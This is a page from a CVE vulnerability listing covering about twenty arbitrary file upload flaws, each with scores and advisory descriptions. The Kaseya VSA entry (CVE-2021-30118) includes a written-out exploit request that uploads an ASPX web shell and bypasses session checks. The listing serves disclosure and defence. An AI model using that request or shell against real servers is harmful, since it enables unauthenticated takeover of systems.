Total
2507 CVE
| CVE | Vendors | Products | Updated | CVSS v3.1 |
|---|---|---|---|---|
| CVE-2021-30118 | 1 Kaseya | 1 Vsa | 2024-08-03 | 9.8 Critical |
| An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 <%@ Page Language="C#" Debug="true" validateRequest="false" %> <%@ Import namespace="System.Web.UI.WebControls" %> <%@ Import namespace="System.Diagnostics" %> <%@ Import namespace="System.IO" %> <%@ Import namespace="System" %> <%@ Import namespace="System.Data" %> <%@ Import namespace="System.Data.SqlClient" %> <%@ Import namespace="System.Security.AccessControl" %> <%@ Import namespace="System.Security.Principal" %> <%@ Import namespace="System.Collections.Generic" %> <%@ Import namespace="System.Collections" %> <script runat="server"> private const string password = "pass"; // The password ( pass ) private const string style = "dark"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); <snip> ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise. | ||||
| CVE-2021-29641 | 1 Rangerstudio | 1 Directus | 2024-08-03 | 8.8 High |
| Directus 8 before 8.8.2 allows remote authenticated users to execute arbitrary code because file-upload permissions include the ability to upload a .php file to the main upload directory and/or upload a .php file and a .htaccess file to a subdirectory. Exploitation succeeds only for certain installations with the Apache HTTP Server and the local-storage driver (e.g., when the product was obtained from hub.docker.com). | ||||
| CVE-2021-29377 | 1 Pearadmin | 1 Pearadmin Think | 2024-08-03 | 9.8 Critical |
| Pear Admin Think through 2.1.2 has an arbitrary file upload vulnerability that allows attackers to execute arbitrary code remotely. A .php file can be uploaded via admin.php/index/upload because app/common/service/UploadService.php mishandles fileExt. | ||||
| CVE-2021-29281 | 1 Gfi | 1 Archiver | 2024-08-03 | 9.8 Critical |
| File upload vulnerability in GFI Mail Archiver versions up to and including 15.1 via insecure implementation of Telerik Web UI plugin which is affected by CVE-2014-2217, and CVE-2017-11317. | ||||
| CVE-2021-28976 | 1 Get-simple | 1 Getsimplecms | 2024-08-03 | 7.2 High |
| Remote Code Execution vulnerability in GetSimpleCMS before 3.3.16 in admin/upload.php via phar filess. | ||||
| CVE-2021-29022 | 1 Invoiceplane | 1 Invoiceplane | 2024-08-03 | 5.3 Medium |
| In InvoicePlane 1.5.11, the upload feature discloses the full path of the file upload directory. | ||||
| CVE-2021-28998 | 1 Cmsmadesimple | 1 Cms Made Simple | 2024-08-03 | 7.2 High |
| File upload vulnerability in CMS Made Simple through 2.2.15 allows remote authenticated attackers to gain a webshell via a crafted phar file. | ||||
| CVE-2021-28931 | 1 Fork-cms | 1 Fork Cms | 2024-08-03 | 8.8 High |
| Arbitrary file upload vulnerability in Fork CMS 5.9.2 allows attackers to create or replace arbitrary files in the /themes directory via a crafted zip file uploaded to the Themes panel. | ||||
| CVE-2021-28379 | 2 Myvestacp, Vestacp | 2 Myvesta, Vesta Control Panel | 2024-08-03 | 8.8 High |
| web/upload/UploadHandler.php in Vesta Control Panel (aka VestaCP) through 0.9.8-27 and myVesta through 0.9.8-26-39 allows uploads from a different origin. | ||||
| CVE-2021-28428 | 1 Horizontcms Project | 1 Horizontcms | 2024-08-03 | 9.8 Critical |
| File upload vulnerability in HorizontCMS before 1.0.0-beta.3 via uploading a .htaccess and *.hello files using the Media Files upload functionality. The original file upload vulnerability (CVE-2020-27387) was remediated by restricting the PHP extensions; however, we confirmed that the filter was bypassed via uploading an arbitrary .htaccess and *.hello files in order to execute PHP code to gain RCE. | ||||
| CVE-2021-28294 | 1 Online Ordering System Project | 1 Online Ordering System | 2024-08-03 | 9.8 Critical |
| Online Ordering System 1.0 is vulnerable to arbitrary file upload through /onlineordering/GPST/store/initiateorder.php, which may lead to remote code execution (RCE). | ||||
| CVE-2021-27984 | 1 Pluck-cms | 1 Pluck | 2024-08-03 | 8.1 High |
| In Pluck-4.7.15 admin background a remote command execution vulnerability exists when uploading files. | ||||
| CVE-2021-28023 | 1 Servicetonic | 1 Servicetonic | 2024-08-03 | 9.8 Critical |
| Arbitrary file upload in Service import feature in ServiceTonic Helpdesk software version < 9.0.35937 allows a malicious user to execute JSP code by uploading a zip that extracts files in relative paths. | ||||
| CVE-2021-27964 | 1 Sfcyazilim | 1 Sonlogger | 2024-08-03 | 9.8 Critical |
| SonLogger before 6.4.1 is affected by Unauthenticated Arbitrary File Upload. An attacker can send a POST request to /Config/SaveUploadedHotspotLogoFile without any authentication or session header. There is no check for the file extension or content of the uploaded file. | ||||
| CVE-2021-27817 | 1 Shopxo | 1 Shopxo | 2024-08-03 | 9.8 Critical |
| A remote command execution vulnerability in shopxo 1.9.3 allows an attacker to upload malicious code generated by phar where the suffix is JPG, which is uploaded after modifying the phar suffix. | ||||
| CVE-2021-27618 | 1 Sap | 1 Netweaver Process Integration | 2024-08-03 | 4.9 Medium |
| The Integration Builder Framework of SAP Process Integration versions - 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, does not check the file type extension of the file uploaded from local source. An attacker could craft a malicious file and upload it to the application, which could lead to denial of service and impact the availability of the application. | ||||
| CVE-2021-27489 | 1 Zoll | 1 Defibrillator Dashboard | 2024-08-03 | 8.8 High |
| ZOLL Defibrillator Dashboard, v prior to 2.2, The web application allows a non-administrative user to upload a malicious file. This file could allow an attacker to remotely execute arbitrary commands. | ||||
| CVE-2021-27513 | 1 Eyesofnetwork | 1 Eyesofnetwork | 2024-08-03 | 8.8 High |
| The module admin_ITSM in EyesOfNetwork 5.3-10 allows remote authenticated users to upload arbitrary .xml.php files because it relies on "le filtre userside." | ||||
| CVE-2021-26918 | 1 Probot | 1 Bot | 2024-08-03 | 9.8 Critical |
| The ProBot bot through 2021-02-08 for Discord might allow attackers to interfere with the intended purpose of the "Send an image when a user joins the server" feature (or possibly have unspecified other impact) because the uploader web service allows double extensions (such as .html.jpg) with the text/html content type. NOTE: there may not be cases in which an uploader web service is customer controlled; however, the nature of the issue has substantial interaction with customer controlled configuration. NOTE: the vendor states "This is just an uploader (like any other one) which uploads files to cloud storage and accepts various file types. There is no kind of vulnerability and it won't compromise either the client side or the server side. | ||||
| CVE-2021-27428 | 1 Ge | 38 Multilin B30, Multilin B30 Firmware, Multilin B90 and 35 more | 2024-08-03 | 9.8 Critical |
| GE UR IED firmware versions prior to version 8.1x supports upgrading firmware using UR Setup configuration tool – Enervista UR Setup. This UR Setup tool validates the authenticity and integrity of firmware file before uploading the UR IED. An illegitimate user could upgrade firmware without appropriate privileges. The weakness is assessed, and mitigation is implemented in firmware Version 8.10. | ||||